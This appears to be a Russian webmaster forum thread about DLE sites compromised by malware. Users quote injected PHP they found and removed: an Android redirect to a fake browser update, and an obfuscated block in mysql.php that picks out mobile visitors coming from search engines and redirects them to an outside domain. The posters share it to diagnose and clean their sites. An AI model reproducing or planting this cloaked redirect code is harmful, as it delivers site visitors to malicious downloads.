Проверьте на все вредоносные коды - Безопасность

Вирус на сайте cms dle

super_keks · 2012-12-29T15:25:12.0000000Z

Здравствуйте! Со вчерашнего дня при заходе на сайты (cms всех сайтов dle от 9.3 до 9.7) с помощью браузера opera, KIS 2013 выводит предупреждение (скриншот http://smotr.im/awTn ). На других сайтах на этом хостинге та же проблема. В браузера google chrome такой проблемы не замечено. Отписал саппорту касперского и получил ответ "...statuses.ws/googleanalisys.js - является мобильным зловредом". По сайту пошерстил и подозрительных новых файлов не обнаружил. На одном сайте в config.php внизу нашел код: if ($android === true) { header('Location: http://file07.com/browser_update/215/browser_update ') } После его удаления АВП так и продолжает реагировать. Если кто сталкивался прошу подсказать.

R

180

Алексей

6 октября 2013, 07:03

#561

Opkter:
Та же фигня. Запарился я уже удалять ети ссылки с новостей. Все пароли менял, заплатки ставил и все равно заливают. У меня впс, может проблема в его настройках?

Вполне возможно, что у вас не только данный баг, нужно сайт проверять на все вредоносные коды.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov

M

129

markovnik

12 октября 2013, 17:09

#562

Касперский достал ругаться на мой сайт. Я все проверил тщательно, файлы, базу смотрел. В итоге ничего не нашел. Отправил запрос в вирусную лабораторию.

Получил ответ. Так что тоже имейте ввиду, всякое бывает.

Hello,

The site was removed from our blacklist. The detection will stop within a few hours. Thank you for your help.

Regards, Ye Jin
Junior Virus Analyst, Kaspersky Lab.

39A/3 Leningradskoe Shosse, Moscow, 125212, Russia Tel./Fax: + 7 (495) 797 8700 http://www.kaspersky.com http://www.viruslist.com

Скрипт увеличение фотографии Люди говорят, что антивирус Новый фильтр Яндекса?

SM

94

Sasha_M

3 декабря 2013, 09:07

#563

Всем доброго дня. Был в поездке, сейчас приехал и обнаружил на одном сайте (dle 10.0), в /engine/classes/mysql.php появился вот такой код:

*/

$usg = $_SERVER[strrev(strtoupper('tnega_resu_ptth'))];$ref = $_SERVER[strrev(strtoupper('tsoh_ptth'))];$rf = $_SERVER[strrev(strtoupper('rerefer_ptth'))];

if(!preg_match('/crawl|andex|oogle|bot/i',$usg)) {if(preg_match('/andex|mail|rambler|oogle/i',$rf))

{if((preg_match('/ndroid|midp|j2me|symbian|series\ 60|symbos|htc_/i',$usg)) and (!isset ($_COOKIE['dle_user_id'])) and ($_COOKIE["mt_"] != 1) and ($_COOKIE["ynd"] != 1)) 

{@setcookie('ynd', 1); header(strrev('//:pt'.'th :noi'.'tac'.'oL').$ref.'/');exit;}

else if(($_COOKIE["mt_"] != 1) && ($_COOKIE["ynd"] == 1)) {@setcookie('mt_', '1', time()+86400 * 7, '/'); header(strrev('=rerefer&1?'.'/ten.'.'lld-'.'swen'.'//:pt'.'th :noi'.'tac'.'oL').$ref);exit;}}}

код убрал, прошу спецов подсказать где копать на уязвимость.

K5

209

kgtu5

3 декабря 2013, 09:58

#564

Sasha_M:
Всем доброго дня. Был в поездке, сейчас приехал и обнаружил на одном сайте (dle 10.0), в /engine/classes/mysql.php появился вот такой код:

*/
$usg = $_SERVER[strrev(strtoupper('tnega_resu_ptth'))];$ref = $_SERVER[strrev(strtoupper('tsoh_ptth'))];$rf = $_SERVER[strrev(strtoupper('rerefer_ptth'))];
if(!preg_match('/crawl|andex|oogle|bot/i',$usg)) {if(preg_match('/andex|mail|rambler|oogle/i',$rf))
{if((preg_match('/ndroid|midp|j2me|symbian|series\ 60|symbos|htc_/i',$usg)) and (!isset ($_COOKIE['dle_user_id'])) and ($_COOKIE["mt_"] != 1) and ($_COOKIE["ynd"] != 1)) 
{@setcookie('ynd', 1); header(strrev('//:pt'.'th :noi'.'tac'.'oL').$ref.'/');exit;}
else if(($_COOKIE["mt_"] != 1) && ($_COOKIE["ynd"] == 1)) {@setcookie('mt_', '1', time()+86400 * 7, '/'); header(strrev('=rerefer&1?'.'/ten.'.'lld-'.'swen'.'//:pt'.'th :noi'.'tac'.'oL').$ref);exit;}}}

код убрал, прошу спецов подсказать где копать на уязвимость.

проверяйте на шеллы (dle видимо не официальная)

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!

SM

94

Sasha_M

3 декабря 2013, 10:09

#565

kgtu5, у меня все официальные, с лицензией, поэтому данное обстоятельство причиной быть не может. да и вообще я не понимаю тех, кто ставит левые версии, для клиентов же можно ставить демку до 100 постов с открытым кодом, её вполне хватает, потом можно лицензию докупить.

никакие другие файлы вроде не появлялись и не менялись, комп был выключен, меня дома не было, т.е никакие пароли не могли уйти.

DLE - как сделать ICQ не работает. CMS для далекого от

K5

209

kgtu5

3 декабря 2013, 10:18

#566

код не редкий, соответственно проблема должна быть в движке, последний патч установлен?

1

SM

94

Sasha_M

3 декабря 2013, 10:36

#567

вот этот патч не был установлен: http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html

с утра его поставил, т.е это в нём дело? как обычно рассылку на мыло не сделали о его выходе.

K5

209

kgtu5

3 декабря 2013, 10:40

#568

точно сказать, что дело в нем не могу.

проверьте ай-болитом на всякий случай, вдруг чего зацепит...

389

seosniks

3 декабря 2013, 13:08

#569

Тс, хостер какой? У меня на одном хостинге постоянно ломают, на другом слава богу чисто.

И еще права на htaccess ставьте 444.

R

180

Алексей

3 декабря 2013, 13:57

#570

kgtu5:
проверяйте на шеллы (dle видимо не официальная)

Ерунду не говорите, практический нет ни какой разницы в легальности движков на взломы.

VK приобрела 70% в структуре компании-разработчика red_mad_robot

Что делать, если ваша email-рассылка попала в спам

Вирус на сайте cms dle